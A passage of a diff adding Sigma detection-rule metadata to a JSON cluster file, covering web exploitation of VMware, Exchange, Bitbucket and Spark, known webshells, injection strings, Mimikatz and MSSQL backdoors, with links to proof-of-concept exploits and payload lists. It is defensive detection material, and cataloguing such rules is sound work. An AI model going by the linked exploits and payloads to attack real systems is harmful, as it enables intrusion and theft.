"fcf1101d-07c9-49b2-ad81-7e421ff96d80", + "value": "CVE-2022-31656 VMware Workspace ONE Access Auth Bypass" + }, + { + "description": "Detects possible exploitation of VMware Workspace ONE Access Admin Remote Code Execution vulnerability as described in CVE-2022-31659", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/12", + "falsepositive": [ + "Vulnerability scanners", + "Legitimate access to the URI" + ], + "filename": "web_cve_2022_31659_vmware_rce.yml", + "level": "medium", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_31659_vmware_rce.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "efdb2003-a922-48aa-8f37-8b80021a9706", + "value": "CVE-2022-31659 VMware Workspace ONE Access RCE" + }, + { + "description": "Detects attempts to exploit an apache spark server via CVE-2014-6287 from a weblogs perspective", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/19", + "falsepositive": [ + "Web vulnerability scanners" + ], + "filename": "web_cve_2022_33891_spark_shell_command_injection.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py", + "https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html", + "https://github.com/apache/spark/pull/36315/files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_33891_spark_shell_command_injection.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "cve.2022.33891" + ] + }, + "uuid": "1a9a04fd-02d1-465c-abad-d733fd409f9c", + "value": "Apache Spark Shell Command Injection - Weblogs" + }, + { + "description": "Detects attempts to exploit the Atlassian Bitbucket Command Injection CVE-2022-36804", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/29", + "falsepositive": [ + "Web vulnerability scanners" + ], + "filename": "web_cve_2022_36804_atlassian_bitbucket_command_injection.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://twitter.com/_0xf4n9x_/status/1572052954538192901", + "https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/", + "https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html", + "https://blog.assetnote.io/2022/09/14/rce-in-bitbucket-server/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_36804_atlassian_bitbucket_command_injection.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "cve.2022.36804" + ] + }, + "uuid": "65c0a0ab-d675-4441-bd6b-d3db226a2685", + "value": "Atlassian Bitbucket Command Injection Via Archive API" + }, + { + "description": "Detects exploitation attempts in Exchange server logs as described in blog posts reporting on HAFNIUM group activity", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/03/03", + "falsepositive": [ + "Legitimate access to other web applications that use the same folder names as Exchange (e.g. owa, ecp) but are not Microsoft Exchange related" + ], + "filename": "web_exchange_exploitation_hafnium.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_exchange_exploitation_hafnium.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "67bce556-312f-4c81-9162-c3c9ff2599b2", + "value": "Exchange Exploitation Used by HAFNIUM" + }, + { + "description": "Detects URL patterns that could be found in ProxyShell exploitation attempts against Exchange servers (failed and successful)", + "meta": { + "author": "Florian Roth, Rich Warren", + "creation_date": "2021/08/07", + "falsepositive": [ + "Unknown" + ], + "filename": "web_exchange_proxyshell.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://youtu.be/5mqid-7zp8k?t=2231", + "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", + "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_exchange_proxyshell.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "23eee45e-933b-49f9-ae1b-df706d2d52ef", + "value": "Exchange ProxyShell Pattern" + }, + { + "description": "Detects URP patterns and status codes that indicate a successful ProxyShell exploitation attack against Exchange servers", + "meta": { + "author": "Florian Roth, Rich Warren", + "creation_date": "2021/08/09", + "falsepositive": [ + "Unknown" + ], + "filename": "web_exchange_proxyshell_successful.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://youtu.be/5mqid-7zp8k?t=2231", + "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", + "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_exchange_proxyshell_successful.yml" + ], + "tags": [ + "attack.initial_access" + ] + }, + "uuid": "992be1eb-e5da-437e-9a54-6d13b57bb4d8", + "value": "Successful Exchange ProxyShell Attack" + }, + { + "description": "When IIS uses an old .Net Framework it's possible to enumerate folders with the symbol \"~\"", + "meta": { + "author": "frack113", + "creation_date": "2021/10/06", + "falsepositive": [ + "Unknown" + ], + "filename": "web_iis_tilt_shortname_scan.yml", + "level": "medium", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/fuzzing/iis-shortname.yaml", + "https://www.exploit-db.com/exploits/19525", + "https://github.com/lijiejie/IIS_shortname_Scanner", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_iis_tilt_shortname_scan.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "7cb02516-6d95-4ffc-8eee-162075e111ac", + "value": "Successful IIS Shortname Fuzzing Scan" + }, + { + "description": "Detects possible Java payloads in web access logs", + "meta": { + "author": "frack113", + "creation_date": "2022/06/04", + "falsepositive": [ + "Legitimate apps" + ], + "filename": "web_java_payload_in_access_logs.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/", + "https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/", + "https://github.com/httpvoid/writeups/blob/62d3751945289d088ccfdf4d0ffbf61598a2cd7d/Confluence-RCE.md", + "https://twitter.com/httpvoid0x2f/status/1532924261035384832", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_java_payload_in_access_logs.yml" + ], + "tags": [ + "cve.2022.26134", + "cve.2021.26084" + ] + }, + "uuid": "583aa0a2-30b1-4d62-8bf3-ab73689efe6c", + "value": "Java Payload Strings" + }, + { + "description": "Detects exploitation attempt using the JDNIExploiit Kit", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/12/12", + "falsepositive": [ + "Legitimate apps the use these paths" + ], + "filename": "web_jndi_exploit.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://github.com/pimps/JNDI-Exploit-Kit", + "https://githubmemory.com/repo/FunctFan/JNDIExploit", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_jndi_exploit.yml" + ], + "tags": "No established tags" + }, + "uuid": "412d55bc-7737-4d25-9542-5b396867ce55", + "value": "JNDIExploit Pattern" + }, + { + "description": "Detects possible exploitation activity or bugs in a web application", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2017/02/19", + "falsepositive": [ + "Unstable application", + "Application that misuses the response codes" + ], + "filename": "web_multiple_susp_resp_codes_single_source.yml", + "level": "medium", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_multiple_susp_resp_codes_single_source.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "6fdfc796-06b3-46e8-af08-58f3505318af", + "value": "Multiple Suspicious Resp Codes Caused by Single Client" + }, + { + "description": "Detects a core dump of a crashing Nginx worker process, which could be a signal of a serious problem or exploitation attempts.", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/05/31", + "falsepositive": [ + "Serious issues with a configuration or plugin" + ], + "filename": "web_nginx_core_dump.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "No established product", + "refs": [ + "https://docs.nginx.com/nginx/admin-guide/monitoring/debugging/#enabling-core-dumps", + "https://www.x41-dsec.de/lab/advisories/x41-2021-002-nginx-resolver-copy/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_nginx_core_dump.yml" + ], + "tags": [ + "attack.impact", + "attack.t1499.004" + ] + }, + "uuid": "59ec40bb-322e-40ab-808d-84fa690d7e56", + "value": "Nginx Core Dump" + }, + { + "description": "Detects path traversal exploitation attempts", + "meta": { + "author": "Subhash Popuri (@pbssubhash), Florian Roth (generalisation)", + "creation_date": "2021/09/25", + "falsepositive": [ + "Happens all the time on systems exposed to the Internet", + "Internal vulnerability scanners" + ], + "filename": "web_path_traversal_exploitation_attempt.yml", + "level": "medium", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://github.com/projectdiscovery/nuclei-templates", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_path_traversal_exploitation_attempt.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "7745c2ea-24a5-4290-b680-04359cb84b35", + "value": "Path Traversal Exploitation Attempts" + }, + { + "description": "Detects access to SUPERNOVA webshell as described in Guidepoint report", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/12/17", + "falsepositive": [ + "Unknown" + ], + "filename": "web_solarwinds_supernova_webshell.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/", + "https://www.anquanke.com/post/id/226029", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_solarwinds_supernova_webshell.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "a2cee20b-eacc-459f-861d-c02e5d12f1db", + "value": "Solarwinds SUPERNOVA Webshell Access" + }, + { + "description": "Detects exploitation attempts of the SonicWall Jarrewrite Exploit", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/01/25", + "falsepositive": [ + "Unknown" + ], + "filename": "web_sonicwall_jarrewrite_exploit.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_sonicwall_jarrewrite_exploit.yml" + ], + "tags": [ + "attack.t1190", + "attack.initial_access" + ] + }, + "uuid": "6f55f047-112b-4101-ad32-43913f52db46", + "value": "SonicWall SSL/VPN Jarrewrite Exploit" + }, + { + "description": "Detects source code enumeration that use GET requests by keyword searches in URL strings", + "meta": { + "author": "James Ahearn", + "creation_date": "2019/06/08", + "falsepositive": [ + "Unknown" + ], + "filename": "web_source_code_enumeration.yml", + "level": "medium", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://pentester.land/tutorials/2018/10/25/source-code-disclosure-via-exposed-git-folder.html", + "https://medium.com/@logicbomb_1/bugbounty-how-i-was-able-to-download-the-source-code-of-indias-largest-telecom-service-52cf5c5640a1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_source_code_enumeration.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083" + ] + }, + "uuid": "953d460b-f810-420a-97a2-cfca4c98e602", + "value": "Source Code Enumeration Detection by Keyword" + }, + { + "description": "Detects SQL Injection attempts via GET requests in access logs", + "meta": { + "author": "Saw Win Naung, Nasreddine Bencherchali", + "creation_date": "2020/02/22", + "falsepositive": [ + "Java scripts and CSS Files", + "User searches in search boxes of the respective website", + "Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as \"User Agent\" strings and more response codes" + ], + "filename": "web_sql_injection_in_access_logs.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/", + "https://www.acunetix.com/blog/articles/using-logs-to-investigate-a-web-application-attack/", + "https://brightsec.com/blog/sql-injection-payloads/", + "https://github.com/payloadbox/sql-injection-payload-list", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_sql_injection_in_access_logs.yml" + ], + "tags": "No established tags" + }, + "uuid": "5513deaf-f49a-46c2-a6c8-3f111b5cb453", + "value": "SQL Injection Strings" + }, + { + "description": "Detects SSTI attempts sent via GET requests in access logs", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/14", + "falsepositive": [ + "User searches in search boxes of the respective website", + "Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as \"User Agent\" strings and more response codes" + ], + "filename": "web_ssti_in_access_logs.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection", + "https://github.com/payloadbox/ssti-payloads", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_ssti_in_access_logs.yml" + ], + "tags": "No established tags" + }, + "uuid": "ada3bc4f-f0fd-42b9-ba91-e105e8af7342", + "value": "Server Side Template Injection Strings" + }, + { + "description": "Detects known suspicious (default) user-agents related to scanning/recon tools", + "meta": { + "author": "Nasreddine Bencherchali, Tim Shelton", + "creation_date": "2022/07/19", + "falsepositive": [ + "Unknown" + ], + "filename": "web_susp_useragents.yml", + "level": "medium", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://github.com/wpscanteam/wpscan/blob/196fbab5b1ce3870a43515153d4f07878a89d410/lib/wpscan/browser.rb", + "https://github.com/xmendez/wfuzz/blob/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/docs/user/basicusage.rst", + "https://github.com/lanmaster53/recon-ng/blob/9e907dfe09fce2997f0301d746796408e01a60b7/recon/core/base.py#L92", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_susp_useragents.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "19aa4f58-94ca-45ff-bc34-92e533c0994a", + "value": "Suspicious User-Agents Related To Recon Tools" + }, + { + "description": "Detects suspicious windows strins in URI which could indicate possible exfiltration or webshell communication", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/06", + "falsepositive": [ + "Legitimate application and websites that use windows paths in their URL" + ], + "filename": "web_susp_windows_path_uri.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_susp_windows_path_uri.yml" + ], + "tags": [ + "attack.persistence", + "attack.exfiltration", + "attack.t1505.003" + ] + }, + "uuid": "9f6a34b4-2688-4eb7-a7f5-e39fef573d0e", + "value": "Suspicious Windows Strings In URI" + }, + { + "description": "Detects access to DEWMODE webshell as described in FIREEYE report", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/02/22", + "falsepositive": [ + "Unknown" + ], + "filename": "web_unc2546_dewmode_php_webshell.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_unc2546_dewmode_php_webshell.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "fdf96c90-42d5-4406-8a9c-14a2c9a016b5", + "value": "DEWMODE Webshell Access" + }, + { + "description": "Certain strings in the uri_query field when combined with null referer and null user agent can indicate activity associated with the webshell ReGeorg.", + "meta": { + "author": "Cian Heasley", + "creation_date": "2020/08/04", + "falsepositive": [ + "Web applications that use the same URL parameters as ReGeorg" + ], + "filename": "web_webshell_regeorg.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://community.rsa.com/community/products/netwitness/blog/2019/02/19/web-shells-and-netwitness-part-3", + "https://github.com/sensepost/reGeorg", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_webshell_regeorg.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "2ea44a60-cfda-11ea-87d0-0242ac130003", + "value": "Webshell ReGeorg Detection Via Web Logs" + }, + { + "description": "Detects Windows Webshells that use GET requests via access logs", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali", + "creation_date": "2017/02/19", + "falsepositive": [ + "Web sites like wikis with articles on os commands and pages that include the os commands in the URLs", + "User searches in search boxes of the respective website" + ], + "filename": "web_win_webshells_in_access_logs.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://bad-jubies.github.io/RCE-NOW-WHAT/", + "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_win_webshells_in_access_logs.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "7ff9db12-1b94-4a79-ba68-a2402c5d6729", + "value": "Windows Webshell Strings" + }, + { + "description": "Detects XSS attempts injected via GET requests in access logs", + "meta": { + "author": "Saw Win Naung, Nasreddine Bencherchali", + "creation_date": "2021/08/15", + "falsepositive": [ + "JavaScripts,CSS Files and PNG files", + "User searches in search boxes of the respective website", + "Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as \"User Agent\" strings and more response codes" + ], + "filename": "web_xss_in_access_logs.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://github.com/payloadbox/xss-payload-list", + "https://portswigger.net/web-security/cross-site-scripting/contexts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_xss_in_access_logs.yml" + ], + "tags": "No established tags" + }, + "uuid": "65354b83-a2ea-4ea6-8414-3ab38be0d409", + "value": "Cross Site Scripting Strings" + }, + { + "description": "This method detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz version that are however still used by different threat groups)", + "meta": { + "author": "Florian Roth (rule), David ANDRE (additional keywords)", + "creation_date": "2017/01/10", + "falsepositive": [ + "Naughty administrators", + "AV Signature updates", + "Files with Mimikatz in their filename" + ], + "filename": "win_alert_mimikatz_keywords.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://tools.thehacker.recipes/mimikatz/modules", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/win_alert_mimikatz_keywords.yml" + ], + "tags": [ + "attack.s0002", + "attack.lateral_movement", + "attack.credential_access", + "car.2013-07-001", + "car.2019-04-004", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.001", + "attack.t1003.006" + ] + }, + "uuid": "06d71506-7beb-4f22-8888-e2e5e2ca7fd8", + "value": "Mimikatz Use" + }, + { + "description": "Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited.\nMS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability.\nUnfortunately, that is about the only instance of CVEs being written to this log.\n", + "meta": { + "author": "Florian Roth, Zach Mathis", + "creation_date": "2020/01/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_audit_cve.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/VM_vivisector/status/1217190929330655232", + "https://twitter.com/DidierStevens/status/1217533958096924676", + "https://twitter.com/FlemmingRiis/status/1217147415482060800", + "https://www.youtube.com/watch?v=ebmW42YYveI", + "https://nullsec.us/windows-event-log-audit-cve/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_audit_cve.yml" + ], + "tags": [ + "attack.execution", + "attack.t1203", + "attack.privilege_escalation", + "attack.t1068", + "attack.defense_evasion", + "attack.t1211", + "attack.credential_access", + "attack.t1212", + "attack.lateral_movement", + "attack.t1210", + "attack.impact", + "attack.t1499.004" + ] + }, + "uuid": "48d91a3a-2363-43ba-a456-ca71ac3da5c2", + "value": "Audit CVE Event" + }, + { + "description": "This detection method points out highly relevant Antivirus events", + "meta": { + "author": "Florian Roth, Arnim Rupp", + "creation_date": "2017/02/19", + "falsepositive": [ + "Some software piracy tools (key generators, cracks) are classified as hack tools" + ], + "filename": "win_av_relevant_match.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.virustotal.com/gui/file/13828b390d5f58b002e808c2c4f02fdd920e236cc8015480fa33b6c1a9300e31", + "https://www.virustotal.com/gui/file/15b57c1b68cd6ce3c161042e0f3be9f32d78151fe95461eedc59a79fc222c7ed", + "https://www.virustotal.com/gui/file/5092b2672b4cb87a8dd1c2e6047b487b95995ad8ed5e9fc217f46b8bfb1b8c01", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_av_relevant_match.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588" + ] + }, + "uuid": "78bc5783-81d9-4d73-ac97-59f6db4f72a8", + "value": "Relevant Anti-Virus Event" + }, + { + "description": "An application has been removed. Check if it is critical.", + "meta": { + "author": "frack113", + "creation_date": "2022/01/28", + "falsepositive": [ + "Unknown" + ], + "filename": "win_builtin_remove_application.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_builtin_remove_application.yml" + ], + "tags": [ + "attack.impact", + "attack.t1489" + ] + }, + "uuid": "570ae5ec-33dc-427c-b815-db86228ad43e", + "value": "Application Uninstalled" + }, + { + "description": "Detects potential abuse of ntdsutil to dump ntds.dit database", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/14", + "falsepositive": [ + "Legitimate backup operation/creating shadow copies" + ], + "filename": "win_esent_ntdsutil_abuse.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mgreen27/status/1558223256704122882", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_esent_ntdsutil_abuse.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "e6e88853-5f20-4c4a-8d26-cd469fd8d31f", + "value": "Ntdsutil Abuse" + }, + { + "description": "Detects potential abuse of ntdsutil to dump ntds.dit database to a suspicious location", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/14", + "falsepositive": [ + "Legitimate backup operation/creating shadow copies" + ], + "filename": "win_esent_ntdsutil_abuse_susp_location.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mgreen27/status/1558223256704122882", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_esent_ntdsutil_abuse_susp_location.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "94dc4390-6b7c-4784-8ffc-335334404650", + "value": "Dump Ntds.dit To Suspicious Location" + }, + { + "description": "Detects MSI package installation from suspicious locations", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/31", + "falsepositive": [ + "Some false positives may occur depending on the environnement" + ], + "filename": "win_msi_install_from_susp_locations.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_msi_install_from_susp_locations.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "c7c8aa1c-5aff-408e-828b-998e3620b341", + "value": "MSI Installation From Suspicious Locations" + }, + { + "description": "Detects installation of a remote msi file from web.", + "meta": { + "author": "Stamatis Chatzimangou", + "creation_date": "2022/10/23", + "falsepositive": [ + "Unknown" + ], + "filename": "win_msi_install_from_web.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/_st0pp3r_/status/1583922009842802689", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_msi_install_from_web.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218", + "attack.t1218.007" + ] + }, + "uuid": "5594e67a-7f92-4a04-b65d-1a42fd824a60", + "value": "MSI Installation From Web" + }, + { + "description": "Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/13", + "falsepositive": [ + "Rare legitimate administrative activity" + ], + "filename": "win_mssql_add_sysadmin_account.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_add_sysadmin_account.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "08200f85-2678-463e-9c32-88dce2f073d1", + "value": "MSSQL Add Account To Sysadmin Role" + }, + { + "description": "Detects when an attacker calls the \"ALTER SERVER AUDIT\" or \"DROP SERVER AUDIT\" transaction in order to delete or disable audit logs on the server", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/13", + "falsepositive": [ + "This event should only fire when an administrator is modifying the audit policy. Which should be a rare occurrence once it's set up" + ], + "filename": "win_mssql_disable_audit_settings.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", + "https://docs.microsoft.com/en-us/sql/t-sql/statements/drop-server-audit-transact-sql?view=sql-server-ver16", + "https://docs.microsoft.com/en-us/sql/t-sql/statements/alter-server-audit-transact-sql?view=sql-server-ver16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_disable_audit_settings.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "350dfb37-3706-4cdc-9e2e-5e24bc3a46df", + "value": "MSSQL Disable Audit Settings" + }, + { + "description": "This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server", + "meta": { + "author": "Denis Szadkowski, DIRT / DCSO CyTec", + "creation_date": "2022/10/09", + "falsepositive": [ + "Legitimate extended stored procedures named maggie" + ], + "filename": "win_mssql_sp_maggie.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@DCSO_CyTec/mssql-meet-maggie-898773df3b01", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_sp_maggie.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546" + ] + }, + "uuid": "711ab2fe-c9ba-4746-8840-5228a58c3cb8", + "value": "MSSQL Extended Stored Procedure Backdoor Maggie" + }, + { + "description": "Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/13", + "falsepositive": [ + "Legitimate use of the feature by administrators (rare)" + ], + "filename": "win_mssql_sp_procoption_set.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", + "https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-procoption-transact-sql?view=sql-server-ver16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_sp_procoption_set.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "b3d57a5c-c92e-4b48-9a79-5f124b7cf964", + "value": "MSSQL SPProcoption Set" + }, + { + "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure is used to execute commands", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/12", + "falsepositive": [ + "Unknown" + ], + "filename": "win_mssql_xp_cmdshell_audit_log.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", + "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_xp_cmdshell_audit_log.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "7f103213-a04e-4d59-8261-213dddf22314", + "value": "MSSQL XPCmdshell Suspicious Execution" + }, + { + "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure setting is changed", + 